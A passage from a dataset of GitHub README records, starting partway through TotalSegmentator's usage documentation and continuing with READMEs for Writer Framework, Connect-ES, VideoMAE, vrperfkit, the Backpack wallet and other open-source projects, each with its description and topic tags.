It will run a lower resolution model (3mm instead of 1.5mm). --roi_subset : Takes a space-separated list of class names (e.g. spleen colon brain ) and only predicts those classes. Saves a lot of runtime and memory. Might be less accurate especially for small classes (e.g. prostate). --preview : This will generate a 3D rendering of all classes, giving you a quick overview if the segmentation worked and where it failed (see preview.png in output directory). --ml : This will save one nifti file containing all labels instead of one file for each class. Saves runtime during saving of nifti files. (see here for index to class name mapping). --statistics : This will generate a file statistics.json with volume (in mm³) and mean intensity of each class. --radiomics : This will generate a file statistics_radiomics.json with the radiomics features of each class. You have to install pyradiomics to use this ( pip install pyradiomics ). Run via docker We also provide a docker container which can be used in the following way docker run --gpus 'device=0' --ipc=host -v /absolute/path/to/my/data/directory:/tmp wasserth/totalsegmentator:2.2.1 TotalSegmentator -i /tmp/ct.nii.gz -o /tmp/segmentations Running v1 If you want to keep on using TotalSegmentator v1 (e.g. because you do not want to change your pipeline) you can install it with the following command: pip install TotalSegmentator==1.5.7 The documentation for v1 can be found here . Bugfixes for v1 are developed in the branch v1_bugfixes . Our Radiology AI publication refers to TotalSegmentator v1. Resource Requirements TotalSegmentator has the following runtime and memory requirements (using an Nvidia RTX 3090 GPU): (1.5mm is the normal model and 3mm is the --fast model. With v2 the runtimes have increased a bit since we added more classes.) If you want to reduce memory consumption you can use the following options: * --fast : This will use a lower-resolution model * --body_seg : This will crop the image to the body region before processing it * --roi_subset <list of classes> : This will only predict a subset of classes * --force_split : This will split the image into 3 parts and process them one after another. (Do not use this for small images. Splitting these into even smaller images will result in a field of view which is too small.) * --nr_thr_saving 1 : Saving big images with several threads will take a lot of memory Train/validation/test split The exact split of the dataset can be found in the file meta.csv inside the dataset . This was used for the validation in our paper. The exact numbers of the results for the high-resolution model (1.5mm) can be found here . The paper shows these numbers in the supplementary materials Figure 11. Retrain model and run evaluation See here for more info on how to train an nnU-Net yourself on the TotalSegmentator dataset, how to split the data into train/validation/test set as in our paper, and how to run the same evaluation as in our paper. Python API You can run totalsegmentator via Python: ```python import nibabel as nib from totalsegmentator.python_api import totalsegmentator if __name__ == "__main__": # option 1: provide input and output as file paths totalsegmentator(input_path, output_path) # option 2: provide input and output as nifti image objects input_img = nib.load(input_path) output_img = totalsegmentator(input_img) nib.save(output_img, output_path) ``` You can see all available arguments here . Running from within the __main__ guard should avoid some multiprocessing issues.
The segmentation image contains the names of the classes in the extended header. If you want to load this additional header information you can use the following code (a short volume-computation sketch follows after the class tables below): ```python from totalsegmentator.nifti_ext_header import load_multilabel_nifti segmentation_nifti_img, label_map_dict = load_multilabel_nifti(image_path) ``` The above code requires pip install xmltodict . Install latest master branch (contains latest bug fixes) pip install git+https://github.com/wasserth/TotalSegmentator.git Other commands If you want to combine some subclasses (e.g. lung lobes) into one binary mask (e.g. entire lung) you can use the following command: totalseg_combine_masks -i totalsegmentator_output_dir -o combined_mask.nii.gz -m lung Normally weights are automatically downloaded when running TotalSegmentator. If you want to download the weights with an extra command (e.g. when building a docker container) use this: totalseg_download_weights -t <task_name> After acquiring a license number for the non-open tasks you can set it with the following command: totalseg_set_license -l aca_12345678910 Typical problems ITK loading Error When you get the following error message ITK ERROR: ITK only supports orthonormal direction cosines. No orthonormal definition was found! you should do pip install SimpleITK==2.0.2 Alternatively you can try fslorient -copysform2qform input_file fslreorient2std input_file output_file Bad segmentations When you get bad segmentation results check the following: * does your input image contain the original HU values or are the intensity values rescaled to a different range? * is the patient normally positioned in the image? (In axial view is the spine at the bottom of the image? In the coronal view is the head at the top of the image?) Other TotalSegmentator sends anonymous usage statistics to help us improve it further. You can deactivate it by setting send_usage_stats to false in ~/.totalsegmentator/config.json . At changes and improvements you can see an overview of differences between v1 and v2. Reference For more details see our Radiology AI paper ( freely available preprint ). If you use this tool please cite it as follows Wasserthal, J., Breit, H.-C., Meyer, M.T., Pradella, M., Hinck, D., Sauter, A.W., Heye, T., Boll, D., Cyriac, J., Yang, S., Bach, M., Segeroth, M., 2023. TotalSegmentator: Robust Segmentation of 104 Anatomic Structures in CT Images. Radiology: Artificial Intelligence. https://doi.org/10.1148/ryai.230024 Please also cite nnUNet since TotalSegmentator is heavily based on it. Moreover, we would really appreciate it if you let us know what you are using this tool for. You can also tell us what classes we should add in future releases. You can do so here . Class details The following table shows a list of all classes for task total . TA2 is a standardized way to name anatomy. Mostly the TotalSegmentator names follow this standard. For some classes they differ, as you can see in the table below. Here you can find a mapping of the TotalSegmentator classes to SNOMED-CT codes.
|Index|TotalSegmentator name|TA2 name| |:-----|:-----|:-----| 1 | spleen || 2 | kidney_right || 3 | kidney_left || 4 | gallbladder || 5 | liver || 6 | stomach || 7 | pancreas || 8 | adrenal_gland_right | suprarenal gland | 9 | adrenal_gland_left | suprarenal gland | 10 | lung_upper_lobe_left | superior lobe of left lung | 11 | lung_lower_lobe_left | inferior lobe of left lung | 12 | lung_upper_lobe_right | superior lobe of right lung | 13 | lung_middle_lobe_right | middle lobe of right lung | 14 | lung_lower_lobe_right | inferior lobe of right lung | 15 | esophagus || 16 | trachea || 17 | thyroid_gland || 18 | small_bowel | small intestine | 19 | duodenum || 20 | colon || 21 | urinary_bladder || 22 | prostate || 23 | kidney_cyst_left || 24 | kidney_cyst_right || 25 | sacrum || 26 | vertebrae_S1 || 27 | vertebrae_L5 || 28 | vertebrae_L4 || 29 | vertebrae_L3 || 30 | vertebrae_L2 || 31 | vertebrae_L1 || 32 | vertebrae_T12 || 33 | vertebrae_T11 || 34 | vertebrae_T10 || 35 | vertebrae_T9 || 36 | vertebrae_T8 || 37 | vertebrae_T7 || 38 | vertebrae_T6 || 39 | vertebrae_T5 || 40 | vertebrae_T4 || 41 | vertebrae_T3 || 42 | vertebrae_T2 || 43 | vertebrae_T1 || 44 | vertebrae_C7 || 45 | vertebrae_C6 || 46 | vertebrae_C5 || 47 | vertebrae_C4 || 48 | vertebrae_C3 || 49 | vertebrae_C2 || 50 | vertebrae_C1 || 51 | heart || 52 | aorta || 53 | pulmonary_vein || 54 | brachiocephalic_trunk || 55 | subclavian_artery_right || 56 | subclavian_artery_left || 57 | common_carotid_artery_right || 58 | common_carotid_artery_left || 59 | brachiocephalic_vein_left || 60 | brachiocephalic_vein_right || 61 | atrial_appendage_left || 62 | superior_vena_cava || 63 | inferior_vena_cava || 64 | portal_vein_and_splenic_vein | hepatic portal vein | 65 | iliac_artery_left | common iliac artery | 66 | iliac_artery_right | common iliac artery | 67 | iliac_vena_left | common iliac vein | 68 | iliac_vena_right | common iliac vein | 69 | humerus_left || 70 | humerus_right || 71 | scapula_left || 72 | scapula_right || 73 | clavicula_left | clavicle | 74 | clavicula_right | clavicle | 75 | femur_left || 76 | femur_right || 77 | hip_left || 78 | hip_right || 79 | spinal_cord || 80 | gluteus_maximus_left | gluteus maximus muscle | 81 | gluteus_maximus_right | gluteus maximus muscle | 82 | gluteus_medius_left | gluteus medius muscle | 83 | gluteus_medius_right | gluteus medius muscle | 84 | gluteus_minimus_left | gluteus minimus muscle | 85 | gluteus_minimus_right | gluteus minimus muscle | 86 | autochthon_left || 87 | autochthon_right || 88 | iliopsoas_left | iliopsoas muscle | 89 | iliopsoas_right | iliopsoas muscle | 90 | brain || 91 | skull || 92 | rib_left_1 || 93 | rib_left_2 || 94 | rib_left_3 || 95 | rib_left_4 || 96 | rib_left_5 || 97 | rib_left_6 || 98 | rib_left_7 || 99 | rib_left_8 || 100 | rib_left_9 || 101 | rib_left_10 || 102 | rib_left_11 || 103 | rib_left_12 || 104 | rib_right_1 || 105 | rib_right_2 || 106 | rib_right_3 || 107 | rib_right_4 || 108 | rib_right_5 || 109 | rib_right_6 || 110 | rib_right_7 || 111 | rib_right_8 || 112 | rib_right_9 || 113 | rib_right_10 || 114 | rib_right_11 || 115 | rib_right_12 || 116 | sternum || 117 | costal_cartilages || Class map for task total_mr : |Index|TotalSegmentator name|TA2 name| |:-----|:-----|:-----| 1 | spleen || 2 | kidney_right || 3 | kidney_left || 4 | gallbladder || 5 | liver || 6 | stomach || 7 | pancreas || 8 | adrenal_gland_right | suprarenal gland | 9 | adrenal_gland_left | suprarenal gland | 10 | lung_left || 11 | lung_right || 12 | esophagus || 13 |
small_bowel | small intestine | 14 | duodenum || 15 | colon || 16 | urinary_bladder || 17 | prostate || 18 | sacrum || 19 | vertebrae || 20 | intervertebral_discs || 21 | spinal_cord || 22 | heart || 23 | aorta || 24 | inferior_vena_cava || 25 | portal_vein_and_splenic_vein | hepatic portal vein | 26 | iliac_artery_left | common iliac artery | 27 | iliac_artery_right | common iliac artery | 28 | iliac_vena_left | common iliac vein | 29 | iliac_vena_right | common iliac vein | 30 | humerus_left || 31 | humerus_right || 32 | fibula || 33 | tibia || 34 | femur_left || 35 | femur_right || 36 | hip_left || 37 | hip_right || 38 | gluteus_maximus_left | gluteus maximus muscle | 39 | gluteus_maximus_right | gluteus maximus muscle | 40 | gluteus_medius_left | gluteus medius muscle | 41 | gluteus_medius_right | gluteus medius muscle | 42 | gluteus_minimus_left | gluteus minimus muscle | 43 | gluteus_minimus_right | gluteus minimus muscle | 44 | autochthon_left || 45 | autochthon_right || 46 | iliopsoas_left | iliopsoas muscle | 47 | iliopsoas_right | iliopsoas muscle | 48 | quadriceps_femoris_left || 49 | quadriceps_femoris_right || 50 | thigh_medial_compartment_left || 51 | thigh_medial_compartment_right || 52 | thigh_posterior_compartment_left || 53 | thigh_posterior_compartment_right || 54 | sartorius_left || 55 | sartorius_right || 56 | brain ||;Tool for robust segmentation of >100 important anatomical structures in CT and MR images;[]
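As a follow-up to the Python API section above, here is a minimal sketch that uses load_multilabel_nifti to turn the class tables into per-class volumes. It assumes a multilabel segmentation produced with --ml, and the file name is illustrative:

```python
import numpy as np
from totalsegmentator.nifti_ext_header import load_multilabel_nifti

# Load a multilabel segmentation together with the index -> class-name
# mapping stored in the extended NIfTI header (requires xmltodict).
seg_img, label_map = load_multilabel_nifti("segmentations.nii.gz")
data = seg_img.get_fdata()
voxel_volume_mm3 = float(np.prod(seg_img.header.get_zooms()[:3]))

for index, name in label_map.items():
    volume = (data == index).sum() * voxel_volume_mm3
    print(f"{name}: {volume:.0f} mm^3")
```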
wasserth/TotalSegmentator
writer/writer-framework;What is Framework? Writer Framework is an open-source framework for creating AI applications. Build user interfaces using a visual editor; write the backend code in Python. Writer Framework is fast and flexible with a clean, easily-testable syntax. It provides separation of concerns between UI and business logic, enabling more complex applications. Highlights Reactive and state-driven Writer Framework is fully state-driven and provides separation of concerns between user interface and business logic. ```py import writer as wf def handle_increment(state): state["counter"] += 1 wf.init_state({ "counter": 0 }) ``` The user interface is a template, which is defined visually. The template contains reactive references to state, e.g. @{counter} , and references to event handlers, e.g. when Button is clicked, trigger handle_increment . Flexible Elements are highly customizable with no CSS required, allowing for shadows, button icons, background colors, etc. HTML elements with custom CSS can be included using the HTML Element component. They can serve as containers for built-in components. Fast Event handling adds minimal overhead to your Python code (~1-2ms*). Streaming (WebSockets) is used to synchronize frontend and backend states. The script only runs once. Non-blocking by default. Events are handled asynchronously in a thread pool running in a dedicated process. *End-to-end figure, including DOM mutation. Tested locally on a Macbook Air M2. Measurement methodology . Developer-friendly It's all contained in a standard Python package, just one pip install away. User interfaces are saved as JSON, so they can be version controlled together with the rest of the application. Use your local code editor and get instant refreshes when you save your code. Alternatively, use the provided web-based editor. You edit the UI while your app is running. No hitting "Preview" and seeing something completely different to what you expected. Installation and Quickstart Getting started with Writer Framework is easy. It works on Linux, Mac and Windows. sh pip install writer writer hello The first command will install Writer Framework using pip . The second command will create a demo application in the subfolder "hello" and start Writer Framework Builder, the framework's visual editor, which will be accessible via a local URL. The following commands can be used to create, launch Writer Framework Builder and run an application. sh writer create my_app writer edit my_app writer run my_app Documentation Full documentation, including how to use Writer's AI module and deployment options, is available at Writer . About Writer Writer is the full-stack generative AI platform for enterprises. Quickly and easily build and deploy generative AI apps with a suite of developer tools fully integrated with our platform of LLMs, graph-based RAG tools, AI guardrails, and more. Learn more at writer.com . License This project is licensed under the Apache 2.0 License.;No-code in the front, Python in the back. An open-source framework for creating data apps.;data-apps,data-visualization,python,websockets,no-code,developer-tools,interface,interface-builder,models,ui
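Building on the counter example above, here is a short sketch of a handler that reacts to an event payload. The two-argument (state, payload) handler signature is an assumption based on the framework's event-handler conventions rather than something stated in this README:

```python
import writer as wf

def handle_name_change(state, payload):
    # "payload" is assumed to carry the event value, e.g. the new
    # content of a text input bound to this handler in the UI template.
    state["name"] = payload
    state["greeting"] = f"Hello, {payload}!"

wf.init_state({
    "name": "",
    "greeting": "Hello!",
})
```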
writer/writer-framework
reactwg/react-native-new-architecture;React Native New Architecture Working Group The intention of this repository is to coordinate and support the rollout of the React Native New Architecture . We have provided guides and a discussion space for this purpose. You can find New Architecture updates here . Guides How to enable the New Architecture For Apps Enable the New Architecture for Apps For Libraries Make your library compatible with the New Architecture Convert Library to TurboModules/Fabric APIs Additional information for Android Additional information for iOS New Architecture Workflows Create a Fabric Native Component Create a Turbo Native Module Using Codegen to write type-safe Fabric Components and Turbo Modules Writing cross-platform TurboModules with C++ Supporting custom C++ types Using React 18 features Backwards compatibility For Legacy Native Modules For Legacy Native Components Troubleshooting Appendix Discussion This repository is also a place for discussion and feedback on the New Architecture. You can access it by heading over to the Discussions Tab on Github . Sections We've created some sections to keep the discussion focused. | Title | Topic | | ----------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------- | | Announcements 📣 | General announcements about this working group. | | Deep Dive 🐳 | Sharing deep dives and technical-specific topics | | Documentation 📚 | A place to chat about the New Architecture documentation and migration material | | Libraries 🛠 | A place to chat about 3rd party libraries and their migration story to the New Architecture | | Q&A 🤝 | A place to ask the community for help on the New Architecture topics | | Releases 🏁 | Updates on New Architecture in each release |;Workgroup for the New React Native Architecture;react-native,fabric,turbomodule,working-group
reactwg/react-native-new-architecture
connectrpc/connect-es;Connect for ECMAScript Connect is a family of libraries for building type-safe APIs with different languages and platforms. @connectrpc/connect brings them to TypeScript, the web browser, and to Node.js. With Connect, you define your schema first: service ElizaService { rpc Say(SayRequest) returns (SayResponse) {} } And with the magic of code generation, this schema produces servers and clients: ts const answer = await eliza.say({sentence: "I feel happy."}); console.log(answer); // {sentence: 'When you feel happy, what do you do?'} Unlike REST, these remote procedure calls are type-safe, but they are regular HTTP under the hood. You can see all requests in the network inspector, and you can curl them if you want: shell curl \ --header 'Content-Type: application/json' \ --data '{"sentence": "I feel happy."}' \ https://demo.connectrpc.com/connectrpc.eliza.v1.ElizaService/Say Connect uses Protobuf-ES , the only fully-compliant Protobuf JavaScript library. Connect implements three RPC protocols: the widely available gRPC and gRPC-Web protocols, and Connect's own protocol , optimized for the web. This gives you unparalleled interoperability across many platforms and languages, with type-safety end-to-end. Get started on the web Follow our 10 minute tutorial where we use Vite and React to create a web interface for ELIZA. React , Svelte , Vue , Next.js and Angular are supported (see examples ), and we have an expansion pack for TanStack Query . We support all modern web browsers that implement the widely available fetch API and the Encoding API . Get started on Node.js Follow our 10 minute tutorial to spin up a service in Node.js, and call it from the web, and from a gRPC client in your terminal. You can serve your Connect RPCs with vanilla Node.js, or use our server plugins for Fastify , Next.js , and Express . We support Node.js v16 and later with the builtin http and http2 modules. Other platforms Would you like to use Connect on other platforms like Bun, Deno, Vercel’s Edge Runtime, or Cloudflare Workers? We’d love to learn about your use cases and what you’d like to do with Connect. You can reach us either through the Buf Slack or by filing a GitHub issue and we’d be more than happy to chat! Packages @connectrpc/connect : RPC clients and servers for your schema ( source code ). @connectrpc/protoc-gen-connect-es : Code generator plugin for the services in your schema ( source code ). @connectrpc/connect-web : Adapters for web browsers, and any other platform that has the fetch API on board. @connectrpc/connect-node : Serve RPCs on vanilla Node.js servers. Call RPCs with any protocol. @connectrpc/connect-fastify : Plug your services into a Fastify server. @connectrpc/connect-next : Serve your RPCs with Next.js API routes. @connectrpc/connect-express : Adds your services to an Express server. The libraries and the generated code are compatible with ES2017 and TypeScript 4.1.
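To connect the schema and the eliza.say call shown above, here is a sketch of how a browser client is typically wired up with @connectrpc/connect and @connectrpc/connect-web; the generated import path is an assumption, since it depends on your codegen configuration:

```ts
import { createPromiseClient } from "@connectrpc/connect";
import { createConnectTransport } from "@connectrpc/connect-web";
// Assumed output path of protoc-gen-connect-es for the Eliza schema:
import { ElizaService } from "./gen/eliza_connect";

// The transport speaks the Connect protocol over fetch in the browser.
const transport = createConnectTransport({
  baseUrl: "https://demo.connectrpc.com",
});

const eliza = createPromiseClient(ElizaService, transport);
const answer = await eliza.say({ sentence: "I feel happy." });
console.log(answer.sentence); // "When you feel happy, what do you do?"
```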
Ecosystem examples-es : Examples for using Connect with various TypeScript web frameworks and tooling connect-query-es : TypeScript-first expansion pack for TanStack Query that gives you Protobuf superpowers connect-playwright-es : Playwright tests for your Connect application connect-swift : Idiomatic gRPC & Connect RPCs for Swift connect-go : Go implementation of gRPC, gRPC-Web, and Connect examples-go : Example RPC service powering https://demo.connectrpc.com and built with connect-go conformance : gRPC-Web and Connect interoperability tests Buf Studio : web UI for ad-hoc RPCs Status: Stable All packages are stable and have reached a major version release. Legal Offered under the Apache 2 license .;The TypeScript implementation of Connect: Protobuf RPC that works.;grpc-web,protobuf,typescript,grpc,rpc,nodejs,javascript,protoc-plugin,schema,fastify-plugin
connectrpc/connect-es
MCG-NJU/VideoMAE;Official PyTorch Implementation of VideoMAE (NeurIPS 2022 Spotlight). VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training Zhan Tong , Yibing Song , Jue Wang , Limin Wang Nanjing University, Tencent AI Lab 📰 News [2023.4.18] 🎈Everyone can download Kinetics-400 , which is used in VideoMAE, from this link . [2023.4.18] Code and pre-trained models of VideoMAE V2 have been released! Check and enjoy this repo ! [2023.4.17] We propose EVAD , an end-to-end Video Action Detection framework. [2023.2.28] Our VideoMAE V2 is accepted by CVPR 2023 ! 🎉 [2023.1.16] Code and pre-trained models for Action Detection in VideoMAE are available ! [2022.12.27] 🎈Everyone can download extracted VideoMAE features of THUMOS , ActivityNet , HACS and FineAction from InternVideo . [2022.11.20] 👀 VideoMAE is integrated into 🤗 Hugging Face Spaces, supported by @Sayak Paul . [2022.10.25] 👀 VideoMAE is integrated into MMAction2 ; the results on Kinetics-400 can be reproduced successfully. [2022.10.20] The pre-trained models and scripts of ViT-S and ViT-H are available! [2022.10.19] The pre-trained models and scripts on UCF101 are available ! [2022.9.15] VideoMAE is accepted by NeurIPS 2022 as a spotlight presentation! 🎉 [2022.8.8] 👀 VideoMAE is integrated into official 🤗HuggingFace Transformers now! [2022.7.7] We have updated results on the downstream AVA 2.2 benchmark. Please refer to our paper for details. [2022.4.24] Code and pre-trained models are available now! [2022.3.24] ~~Code and pre-trained models will be released here.~~ Welcome to watch this repository for the latest updates. ✨ Highlights 🔥 Masked Video Modeling for Video Pre-Training VideoMAE performs the task of masked video modeling for video pre-training. We propose an extremely high masking ratio (90%-95%) and a tube masking strategy to create a challenging task for self-supervised video pre-training. ⚡️ A Simple, Efficient and Strong Baseline in SSVP VideoMAE uses a simple masked autoencoder and plain ViT backbone to perform video self-supervised learning. Due to the extremely high masking ratio, the pre-training time of VideoMAE is much shorter than that of contrastive learning methods (3.2x speedup). VideoMAE can serve as a simple but strong baseline for future research in self-supervised video pre-training. 😮 High performance, but NO extra data required VideoMAE works well for video datasets of different scales and can achieve 87.4% on Kinetics-400, 75.4% on Something-Something V2, 91.3% on UCF101, and 62.6% on HMDB51. To the best of our knowledge, VideoMAE is the first to achieve state-of-the-art performance on these four popular benchmarks with vanilla ViT backbones while needing no extra data or pre-trained models.
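Since the highlight above hinges on tube masking (the same spatial patches are dropped in every frame, at a 90%-95% ratio), here is a minimal PyTorch sketch of how such a mask can be generated; it illustrates the idea and is not the repository's actual implementation:

```python
import torch

def tube_mask(num_frames: int, num_patches: int, mask_ratio: float = 0.9) -> torch.Tensor:
    """Boolean mask of shape (num_frames, num_patches); True = masked."""
    num_masked = int(mask_ratio * num_patches)
    # Pick one random set of spatial patch indices...
    ids = torch.rand(num_patches).argsort()
    frame_mask = torch.zeros(num_patches, dtype=torch.bool)
    frame_mask[ids[:num_masked]] = True
    # ...and repeat it across time, so masked content cannot simply be
    # copied from temporally adjacent frames ("tubes" along the time axis).
    return frame_mask.unsqueeze(0).expand(num_frames, -1)

# e.g. 8 temporal positions, 14x14 spatial patches, 90% masked
mask = tube_mask(num_frames=8, num_patches=14 * 14, mask_ratio=0.9)
```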
🚀 Main Results ✨ Something-Something V2 | Method | Extra Data | Backbone | Resolution | #Frames x Clips x Crops | Top-1 | Top-5 | | :------: | :--------: | :------: | :--------: | :---------------------: | :---: | :---: | | VideoMAE | no | ViT-S | 224x224 | 16x2x3 | 66.8 | 90.3 | | VideoMAE | no | ViT-B | 224x224 | 16x2x3 | 70.8 | 92.4 | | VideoMAE | no | ViT-L | 224x224 | 16x2x3 | 74.3 | 94.6 | | VideoMAE | no | ViT-L | 224x224 | 32x1x3 | 75.4 | 95.2 | ✨ Kinetics-400 | Method | Extra Data | Backbone | Resolution | #Frames x Clips x Crops | Top-1 | Top-5 | | :------: | :--------: | :------: | :--------: | :---------------------: | :---: | :---: | | VideoMAE | no | ViT-S | 224x224 | 16x5x3 | 79.0 | 93.8 | | VideoMAE | no | ViT-B | 224x224 | 16x5x3 | 81.5 | 95.1 | | VideoMAE | no | ViT-L | 224x224 | 16x5x3 | 85.2 | 96.8 | | VideoMAE | no | ViT-H | 224x224 | 16x5x3 | 86.6 | 97.1 | | VideoMAE | no | ViT-L | 320x320 | 32x4x3 | 86.1 | 97.3 | | VideoMAE | no | ViT-H | 320x320 | 32x4x3 | 87.4 | 97.6 | ✨ AVA 2.2 Please check the code and checkpoints in VideoMAE-Action-Detection . | Method | Extra Data | Extra Label | Backbone | #Frame x Sample Rate | mAP | | :------: | :----------: | :---------: | :------: | :------------------: | :--: | | VideoMAE | Kinetics-400 | ✗ | ViT-S | 16x4 | 22.5 | | VideoMAE | Kinetics-400 | ✓ | ViT-S | 16x4 | 28.4 | | VideoMAE | Kinetics-400 | ✗ | ViT-B | 16x4 | 26.7 | | VideoMAE | Kinetics-400 | ✓ | ViT-B | 16x4 | 31.8 | | VideoMAE | Kinetics-400 | ✗ | ViT-L | 16x4 | 34.3 | | VideoMAE | Kinetics-400 | ✓ | ViT-L | 16x4 | 37.0 | | VideoMAE | Kinetics-400 | ✗ | ViT-H | 16x4 | 36.5 | | VideoMAE | Kinetics-400 | ✓ | ViT-H | 16x4 | 39.5 | | VideoMAE | Kinetics-700 | ✗ | ViT-L | 16x4 | 36.1 | | VideoMAE | Kinetics-700 | ✓ | ViT-L | 16x4 | 39.3 | ✨ UCF101 & HMDB51 | Method | Extra Data | Backbone | UCF101 | HMDB51 | | :------: | :----------: | :------: | :----: | :----: | | VideoMAE | no | ViT-B | 91.3 | 62.6 | | VideoMAE | Kinetics-400 | ViT-B | 96.1 | 73.3 | 🔨 Installation Please follow the instructions in INSTALL.md . ➡️ Data Preparation Please follow the instructions in DATASET.md for data preparation. 🔄 Pre-training The pre-training instruction is in PRETRAIN.md . ⤴️ Fine-tuning with pre-trained models The fine-tuning instruction is in FINETUNE.md . 📍Model Zoo We provide pre-trained and fine-tuned models in MODEL_ZOO.md . 👀 Visualization We provide the script for visualization in vis.sh . Colab notebook for better visualization is coming soon. ☎️ Contact Zhan Tong: tongzhan@smail.nju.edu.cn 👍 Acknowledgements Thanks to Ziteng Gao , Lei Chen, Chongjian Ge , and Zhiyu Zhao for their kind support. This project is built upon MAE-pytorch and BEiT . Thanks to the contributors of these great codebases. 🔒 License The majority of this project is released under the CC-BY-NC 4.0 license as found in the LICENSE file. Portions of the project are available under separate license terms: SlowFast and pytorch-image-models are licensed under the Apache 2.0 license. BEiT is licensed under the MIT license. 
✏️ Citation If you think this project is helpful, please feel free to leave a star⭐️ and cite our paper: ``` @inproceedings{tong2022videomae, title={Video{MAE}: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training}, author={Zhan Tong and Yibing Song and Jue Wang and Limin Wang}, booktitle={Advances in Neural Information Processing Systems}, year={2022} } @article{videomae, title={VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training}, author={Tong, Zhan and Song, Yibing and Wang, Jue and Wang, Limin}, journal={arXiv preprint arXiv:2203.12602}, year={2022} } ```;[NeurIPS 2022 Spotlight] VideoMAE: Masked Autoencoders are Data-Efficient Learners for Self-Supervised Video Pre-Training;self-supervised-learning,action-recognition,video-understanding,masked-autoencoder,transformer,vision-transformer,video-transformer,mae,pytorch,video-representation-learning
MCG-NJU/VideoMAE
fholger/vrperfkit;VR Performance Toolkit Performance-oriented collection of mods for VR games. Included mods: Upscaling techniques (render at lower resolution and upscale to target resolution) AMD FidelityFX Super Resolution NVIDIA Image Scaling AMD Contrast Adaptive Sharpening Fixed foveated rendering (render center of image at full resolution, but drop resolution towards edges) Variable Rate Shading (only for NVIDIA RTX / GTX 16xx cards) Planned mods: "Fixed foveated" rendering (render fewer pixels at the edges of the screen) Radial Density Masking (all GPUs, but works only with a handful of games) Force hidden area mask: don't render pixels at the edges that are not visible in the headset. Many games already use this mask, but not all. This mod will allow you to force its usage. Supported VR runtimes: Oculus OpenVR Supported graphics APIs: Direct3D 11 Installation Extract dxgi.dll and vrperfkit.yml next to the game's main executable. For Unreal Engine games, this is typically <Game>Game\Binaries\Win64\<Game>Game-Win64-Shipping.exe . Edit the vrperfkit.yml config file to your heart's content. The available options are documented inside the config file; you'll have to experiment with them and try which options work for your particular game. Build instructions Clone the repository and init all submodules. git clone https://github.com/fholger/vrperfkit.git cd vrperfkit git submodule init git submodule update --recursive Download the Oculus SDK and extract LibOVR from the downloaded archive to the ThirdParty folder. Download NVAPI (requires NVIDIA developer account) and extract the contents of the Rxxx-developer folder to ThirdParty\nvapi . Run cmake to generate Visual Studio solution files. Build with Visual Studio. Note: Ninja does not work, due to the included shaders that need to be compiled. This is only supported with VS solutions.;VR Performance Toolkit;[]
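As a rough illustration of the "edit vrperfkit.yml" step above, here is a sketch of what a configuration might look like. The key names are assumptions for illustration only, so always start from the vrperfkit.yml shipped with the release and its inline documentation:

```yaml
# Illustrative only: key names are assumed; check the shipped vrperfkit.yml.
upscaling:
  enabled: true
  method: fsr          # one of the included upscalers: fsr, nis, cas
  renderScale: 0.77    # render at 77% per axis, then upscale to full size
  sharpness: 0.7
fixedFoveated:
  enabled: true        # requires an NVIDIA RTX / GTX 16xx card (VRS)
```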
fholger/vrperfkit
btholt/complete-intro-to-web-dev-v3;Build your first web app with little code experience with industry veteran Brian Holt. Course code icon created by Freepik - Flaticon License The code is this repo is licensed under the Apache 2.0 license. The content is licensed under CC-BY-NC-4.0.;The Complete Intro to Web Dev v3, as taught on Frontend Masters;[]
btholt/complete-intro-to-web-dev-v3
coral-xyz/backpack;Backpack A home for your xNFTs Note Backpack is in active development, so all APIs are subject to change. This code is unaudited. Use at your own risk. I repeat. This is not ready for production. Table of contents: Table of contents: Installing the Latest Release Developing Locally Pull the code Temporary preliminary steps Enable self-signed local SSL certs Environment variables Install dependencies Build all packages for production Start everything inside ./packages for development Troubleshooting Install the development version of the extension Not seeing the dev folder? Optionally install the built extension License Installing the Latest Release If you'd like to install the latest dev release, grab the latest build.zip here and add it to your local chrome profile, using developer mode. See the video below. Developing Locally https://user-images.githubusercontent.com/101902546/173857300-fc139113-0af5-46fc-baad-236a2ebf63f1.m4p Pull the code bash git clone git@github.com:coral-xyz/backpack.git cd backpack Temporary preliminary steps Enable self-signed local SSL certs Go to chrome://flags/#allow-insecure-localhost and enable the toggle, then restart chrome. Note: Please don't enable this if you don't know what you're doing. It will leave you vulnerable to exploits if left on. It is recommended to undo this step when you are done developing. Environment variables Install dependencies bash yarn install You can also optionally rename .env.example to .env and set your own variables. Build all packages for production bash yarn build Start everything inside ./packages for development bash yarn start Note: In a fresh repo, you should run yarn build before yarn start . Troubleshooting If you run into issues with builds try running yarn clean and then start again. Seeing `WebSocket connection to 'wss://localhost:9997/ws' failed` error messages in your console? You need to install a SSL certificate for localhost as the one provided by [webpack-dev-server is considered invalid](https://github.com/webpack/webpack-dev-server/issues/2957). This step is optional as `react-refresh` will still function without it, but it's a good idea to try and fix this error because otherwise your browser will be making a lot of failed requests and `webpack-dev-server` might not be functioning to its full capabilities. A relatively simple way of doing this is using [mkcert](https://github.com/FiloSottile/mkcert) Instructions for how to install a trusted self-signed cert on macOS - ``` cd packages/app-extension brew install mkcert mkcert localhost mkcert -install ``` Now the next time you run `yarn start` the errors should no longer appear. Install the development version of the extension Go to chrome://extensions, enable developer mode (top right) and drag the packages/app-extension/dev dir into the window. This version will have (Dev) in the title and supports live-reloading. Not seeing the dev folder? Do you have a stale node process running? Try to kill it all: killall -9 node and start over Try running yarn start from within packages/app-extension while running yarn start from root. This should work. Optionally install the built extension If you want to try the production build of the extension, run yarn build and drag the packages/app-extension/build dir into chrome://extensions as above. 
This version won't have hot-reloading and local plugins won't be visible unless you also run yarn start License Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion by you shall be licensed at the discretion of the repository maintainers without any additional terms or conditions.;🎒 Next level crypto wallet;[]
coral-xyz/backpack
Zaplib/zaplib;⚡ Zaplib Zaplib is an open-source library for speeding up web applications using Rust and WebAssembly. It lets you write high-performance code in Rust, alongside your existing JavaScript code, using simple APIs. To get started, view the docs . License Zaplib is distributed under the terms of both the MIT license and the Apache License (version 2.0). See LICENSE-APACHE and LICENSE-MIT for details. Third party license notices are available in LICENSES-THIRD-PARTY .;⚡ Zaplib is an open-source library for speeding up web applications using Rust and WebAssembly.;[]
Zaplib/zaplib
